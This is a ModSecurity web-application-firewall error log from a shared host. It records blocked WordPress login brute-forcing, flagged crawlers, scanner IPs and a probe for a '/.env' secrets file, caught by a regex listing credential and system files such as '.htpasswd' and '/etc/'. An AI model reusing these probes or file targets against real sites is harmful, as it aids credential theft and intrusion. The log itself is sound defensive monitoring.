[Tue May 26 16:05:50.620582 2026] [security2:error] [pid 773493:tid 773713] [client 106.219.85.83:29228] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 83.85.219.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV3hpgy-Vk4jSdqTCQxQQAAAN8"]
[Tue May 26 16:05:50.620807 2026] [security2:error] [pid 773493:tid 773713] [client 106.219.85.83:29228] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV3hpgy-Vk4jSdqTCQxQQAAAN8"]
[Tue May 26 16:05:51.101100 2026] [security2:error] [pid 773493:tid 773688] [client 57.141.2.37:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV3hpgy-Vk4jSdqTCQxRwAAAMY"]
[Tue May 26 16:05:51.177474 2026] [security2:error] [pid 773493:tid 773668] [client 103.44.52.196:33470] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.52.44.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV3h5gy-Vk4jSdqTCQxVQAAALI"]
[Tue May 26 16:05:51.177580 2026] [security2:error] [pid 773493:tid 773668] [client 103.44.52.196:33470] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV3h5gy-Vk4jSdqTCQxVQAAALI"]
[Tue May 26 16:05:51.420366 2026] [security2:error] [pid 773493:tid 773662] [client 43.164.1.211:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.consultrgb.com"] [uri "/site/index.php"] [unique_id "ahV3h5gy-Vk4jSdqTCQxWAAAAKw"]
[Tue May 26 16:05:51.885640 2026] [security2:error] [pid 773493:tid 773674] [client 176.65.139.232:59588] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.theafterglow-centre.com"] [uri "/.env"] [unique_id "ahV3h5gy-Vk4jSdqTCQxagAAALg"]
[Tue May 26 16:05:53.212213 2026] [security2:error] [pid 773493:tid 773650] [client 57.141.2.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV3iJgy-Vk4jSdqTCQxgwAAAKA"]
[Tue May 26 16:05:53.281224 2026] [security2:error] [pid 773493:tid 773698] [client 74.7.244.44:33674] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "www.api.lagoslawntennisclub1895.com"] [uri "/cgi-sys/404.html"] [unique_id "ahV3iZgy-Vk4jSdqTCQxkwAA0Es"]
[Tue May 26 16:05:55.242450 2026] [security2:error] [pid 773493:tid 773713] [client 57.141.2.10:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV3ipgy-Vk4jSdqTCQxxAAAAN8"]
[Tue May 26 16:05:55.947555 2026] [security2:error] [pid 773493:tid 773647] [client 51.68.107.150:19645] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "glorodrc.com"] [uri "/robots.txt"] [unique_id "ahV3i5gy-Vk4jSdqTCQx3QAAAJ0"]
[Tue May 26 16:05:55.947711 2026] [security2:error] [pid 773493:tid 773647] [client 51.68.107.150:19645] ModSecurity: Warning. Matched phrase "MJ12bot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "glorodrc.com"] [uri "/robots.txt"] [unique_id "ahV3i5gy-Vk4jSdqTCQx3QAAAJ0"]
[Tue May 26 16:05:57.308443 2026] [security2:error] [pid 773493:tid 773708] [client 57.141.2.39:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV3jJgy-Vk4jSdqTCQx7gAAANo"]
[Tue May 26 16:05:59.458058 2026] [security2:error] [pid 773493:tid 773654] [client 57.141.2.27:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV3j5gy-Vk4jSdqTCQyMgAAAKQ"]
[Tue May 26 16:05:59.796760 2026] [core:error] [pid 773493:tid 773535] (13)Permission denied: [remote 44.192.42.196:44312] AH00132: file permissions deny server access: /home1/hotsafa6/public_html/wp-content/plugins/contact-form-7/includes/css/styles.css, referer: https://www.hotsalesretail.com/
[Tue May 26 16:06:00.197606 2026] [core:error] [pid 773493:tid 773531] (13)Permission denied: [remote 44.192.42.196:44312] AH00132: file permissions deny server access: /home1/hotsafa6/public_html/wp-content/plugins/contact-form-7/includes/swv/js/index.js, referer: https://www.hotsalesretail.com/
[Tue May 26 16:06:00.225681 2026] [core:error] [pid 773493:tid 773533] (13)Permission denied: [remote 44.192.42.196:44312] AH00132: file permissions deny server access: /home1/hotsafa6/public_html/wp-content/plugins/contact-form-7/includes/js/index.js, referer: https://www.hotsalesretail.com/
[Tue May 26 16:06:00.598891 2026] [security2:error] [pid 773493:tid 773544] [remote 44.192.42.196:44312] ModSecurity: Access denied with code 406 (phase 1). Pattern match "^POST$" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "187"] [id "900401"] [msg "PHP Spam Botnet"] [hostname "www.hotsalesretail.com"] [uri "/"] [unique_id "ahV3kJgy-Vk4jSdqTCQy2wABADI"], referer: https://www.hotsalesretail.com/
[Tue May 26 16:06:00.920254 2026] [security2:error] [pid 773493:tid 773704] [client 44.192.42.196:44312] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "www.hotsalesretail.com"] [uri "/index.php"] [unique_id "ahV3kJgy-Vk4jSdqTCQy6gAA1nc"], referer: https://www.hotsalesretail.com/
[Tue May 26 16:06:00.951521 2026] [security2:error] [pid 773493:tid 773700] [client 78.46.190.63:45420] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "thegoodsporting.com"] [uri "/index.php"] [unique_id "ahV3kJgy-Vk4jSdqTCQy1wAAANI"], referer: https://thegoodsporting.com
[Tue May 26 16:06:01.088348 2026] [security2:error] [pid 773493:tid 773745] [client 106.219.85.83:31006] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 83.85.219.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV3kZgy-Vk4jSdqTCQy9gAAAP8"]
[Tue May 26 16:06:01.088471 2026] [security2:error] [pid 773493:tid 773745] [client 106.219.85.83:31006] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV3kZgy-Vk4jSdqTCQy9gAAAP8"]
[Tue May 26 16:06:01.409155 2026] [security2:error] [pid 773493:tid 773676] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV3kZgy-Vk4jSdqTCQy8QAAALo"]
[Tue May 26 16:06:02.741243 2026] [security2:error] [pid 773493:tid 773690] [client 103.44.52.196:53210] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.52.44.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV3kpgy-Vk4jSdqTCQzHQAAAMg"]
[Tue May 26 16:06:02.741377 2026] [security2:error] [pid 773493:tid 773690] [client 103.44.52.196:53210] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV3kpgy-Vk4jSdqTCQzHQAAAMg"]
[Tue May 26 16:06:03.043682 2026] [security2:error] [pid 773493:tid 773720] [client 57.141.2.27:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV3kpgy-Vk4jSdqTCQzGwAAAOY"]
[Tue May 26 16:06:03.495819 2026] [security2:error] [pid 773493:tid 773518] [remote 79.116.52.1:58552] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 1.52.116.79.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "avprealty.com"] [uri "/wp-login.php"] [unique_id "ahV3k5gy-Vk4jSdqTCQzLQAA9Bg"]
[Tue May 26 16:06:03.796669 2026] [security2:error] [pid 773493:tid 773660] [client 207.46.13.151:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "bosscoirs.com"] [uri "/index.php"] [unique_id "ahV3kZgy-Vk4jSdqTCQzCAAAAKo"]
[Tue May 26 16:06:04.580010 2026] [security2:error] [pid 773493:tid 773526] [remote 136.110.38.51:55554] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 51.38.110.136.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "poonawallatennisacademy.moes-art.com"] [uri "/wp-login.php"] [unique_id "ahV3lJgy-Vk4jSdqTCQzPwAAxSA"]
[Tue May 26 16:06:04.717274 2026] [security2:error] [pid 773493:tid 773633] [client 62.60.130.182:50584] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 182.130.60.62.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "dprassurance.lk"] [uri "/wp-login.php"] [unique_id "ahV3lJgy-Vk4jSdqTCQzRgAAAI8"]
[Tue May 26 16:06:05.009486 2026] [security2:error] [pid 773493:tid 773664] [client 57.141.2.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV3lJgy-Vk4jSdqTCQzRQAAAK4"]
[Tue May 26 16:06:05.347199 2026] [security2:error] [pid 773493:tid 773686] [client 62.60.130.182:52604] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 182.130.60.62.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "dprassurance.lk"] [uri "/wp-login.php"] [unique_id "ahV3lZgy-Vk4jSdqTCQzXgAAAMQ"], referer: https://wordpress.org/
[Tue May 26 16:06:07.044199 2026] [security2:error] [pid 773493:tid 773665] [client 158.173.67.122:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 122.67.173.158.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "digitalgerminate.com"] [uri "/xmlrpc.php"] [unique_id "ahV3lpgy-Vk4jSdqTCQzhAAAAK8"]
[Tue May 26 16:06:07.630719 2026] [security2:error] [pid 773493:tid 773710] [client 57.141.2.64:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV3l5gy-Vk4jSdqTCQzlQAAANw"]
[Tue May 26 16:06:08.195152 2026] [security2:error] [pid 773493:tid 773671] [client 2a01:4f8:1c1c:7039::1:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "kingsclub.in"] [uri "/wp-login.php"] [unique_id "ahV3l5gy-Vk4jSdqTCQzqAAAtXA"], referer: https://kingsclub.in/wp-login.php
[Tue May 26 16:06:09.365691 2026] [security2:error] [pid 773493:tid 773633] [client 77.68.83.86:55854] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 86.83.68.77.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "glorodavionics.com"] [uri "/images/images/cache.php"] [unique_id "ahV3mZgy-Vk4jSdqTCQzzQAAAI8"], referer: www.google.com
[Tue May 26 16:06:09.413552 2026] [security2:error] [pid 773493:tid 773714] [client 14.236.170.98:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV3mJgy-Vk4jSdqTCQzxAAAAOA"]
[Tue May 26 16:06:09.660911 2026] [security2:error] [pid 773493:tid 773669] [client 57.141.2.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV3mZgy-Vk4jSdqTCQzyQAAALM"]
[Tue May 26 16:06:10.860949 2026] [security2:error] [pid 773493:tid 773629] [client 216.244.66.241:35288] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.ghanemgh.com"] [uri "/tv/92.html"] [unique_id "ahV3mpgy-Vk4jSdqTCQz9wAAAIs"]
[Tue May 26 16:06:10.861060 2026] [security2:error] [pid 773493:tid 773629] [client 216.244.66.241:35288] ModSecurity: Warning. Matched phrase "Dotbot" at REQUEST_HEADERS:User-agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "www.ghanemgh.com"] [uri "/tv/92.html"] [unique_id "ahV3mpgy-Vk4jSdqTCQz9wAAAIs"]
[Tue May 26 16:06:11.339239 2026] [security2:error] [pid 773493:tid 773630] [client 62.60.130.233:51550] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 233.130.60.62.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "autodiscover.osmsi.org.in"] [uri "/wp-login.php"] [unique_id "ahV3m5gy-Vk4jSdqTCQ0BAAAAIw"], referer: https://wordpress.org/
[Tue May 26 16:06:11.675510 2026] [security2:error] [pid 773493:tid 773699] [client 106.219.85.83:30271] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 83.85.219.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV3m5gy-Vk4jSdqTCQ0FgAAANE"]
[Tue May 26 16:06:11.675641 2026] [security2:error] [pid 773493:tid 773699] [client 106.219.85.83:30271] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV3m5gy-Vk4jSdqTCQ0FgAAANE"]
[Tue May 26 16:06:11.697253 2026] [security2:error] [pid 773493:tid 773627] [client 62.60.130.233:61918] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 233.130.60.62.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "autodiscover.osmsi.org.in"] [uri "/wp-login.php"] [unique_id "ahV3m5gy-Vk4jSdqTCQ0FwAAAIk"]
[Tue May 26 16:06:11.719399 2026] [security2:error] [pid 773493:tid 773742] [client 57.141.2.17:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV3m5gy-Vk4jSdqTCQ0BwAAAPw"]
[Tue May 26 16:06:12.208742 2026] [security2:error] [pid 773493:tid 773701] [client 103.44.52.196:43516] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.52.44.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV3nJgy-Vk4jSdqTCQ0HAAAANM"]
[Tue May 26 16:06:12.208881 2026] [security2:error] [pid 773493:tid 773701] [client 103.44.52.196:43516] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV3nJgy-Vk4jSdqTCQ0HAAAANM"]
[Tue May 26 16:06:12.694064 2026] [security2:error] [pid 773493:tid 773577] [remote 206.189.187.127:46386] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 127.187.189.206.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yndglobal.com"] [uri "/wp-login.php"] [unique_id "ahV3nJgy-Vk4jSdqTCQ0LAAAn1M"]
[Tue May 26 16:06:13.377976 2026] [security2:error] [pid 773493:tid 773543] [remote 213.171.208.232:45912] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 232.208.171.213.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahV3nZgy-Vk4jSdqTCQ0OgAAqjE"]
[Tue May 26 16:06:13.417126 2026] [security2:error] [pid 773493:tid 773542] [remote 167.172.25.98:37782] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 98.25.172.167.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "rohiniventures.com"] [uri "/wp-login.php"] [unique_id "ahV3nZgy-Vk4jSdqTCQ0PgAAjDA"]
[Tue May 26 16:06:13.743353 2026] [security2:error] [pid 773493:tid 773627] [client 45.79.207.111:39684] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "302"] [hostname "md-74.webhostbox.net"] [uri "/index.cgi"] [unique_id "ahV3nZgy-Vk4jSdqTCQ0SQAAAIk"]
[Tue May 26 16:06:13.904441 2026] [security2:error] [pid 773493:tid 773747] [client 57.141.2.63:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV3nZgy-Vk4jSdqTCQ0RwAAAQE"]
[Tue May 26 16:06:13.966290 2026] [security2:error] [pid 773493:tid 773724] [client 77.68.83.86:61937] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 86.83.68.77.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "glorodavionics.com"] [uri "/images/images/cache.php"] [unique_id "ahV3nZgy-Vk4jSdqTCQ0VQAAAOo"], referer: www.google.com
[Tue May 26 16:06:15.922228 2026] [security2:error] [pid 773493:tid 773724] [client 57.141.2.10:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV3n5gy-Vk4jSdqTCQ0lwAAAOo"]
[Tue May 26 16:06:17.828987 2026] [security2:error] [pid 773493:tid 773670] [client 57.141.2.38:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV3oZgy-Vk4jSdqTCQ0zgAAALQ"]
[Tue May 26 16:06:18.114213 2026] [security2:error] [pid 773493:tid 773707] [client 85.208.96.202:50662] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/tag/february-7th/day/2022-10-13/"] [unique_id "ahV3opgy-Vk4jSdqTCQ05AAAANk"]
[Tue May 26 16:06:18.114319 2026] [security2:error] [pid 773493:tid 773707] [client 85.208.96.202:50662] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/tag/february-7th/day/2022-10-13/"] [unique_id "ahV3opgy-Vk4jSdqTCQ05AAAANk"]
[Tue May 26 16:06:18.243834 2026] [security2:error] [pid 773493:tid 773692] [client 57.141.2.23:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "avprealty.com"] [uri "/index.php"] [unique_id "ahV3oJgy-Vk4jSdqTCQ0vQAAAMo"]
[Tue May 26 16:06:18.506582 2026] [security2:error] [pid 773493:tid 773641] [client 216.213.27.194:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahV3opgy-Vk4jSdqTCQ07QAAAJc"], referer: https://www.anujtradingco.com/
[Tue May 26 16:06:19.961403 2026] [security2:error] [pid 773493:tid 773651] [client 216.213.27.194:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahV3o5gy-Vk4jSdqTCQ1FQAAAKE"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1418267&moderation-hash=9be30dabce180487f5f9cabe7d60938d
[Tue May 26 16:06:19.983675 2026] [security2:error] [pid 773493:tid 773643] [client 114.119.136.24:55347] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.onesoft.in"] [uri "/"] [unique_id "ahV3o5gy-Vk4jSdqTCQ1GgAAAJk"], referer: https://www.onesoft.in/
[Tue May 26 16:06:20.226755 2026] [security2:error] [pid 773493:tid 773722] [client 20.104.227.76:21911] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpanel.kexcouriers.com"] [uri "/wk/index.php"] [unique_id "ahV3pJgy-Vk4jSdqTCQ1JQAAAOg"]
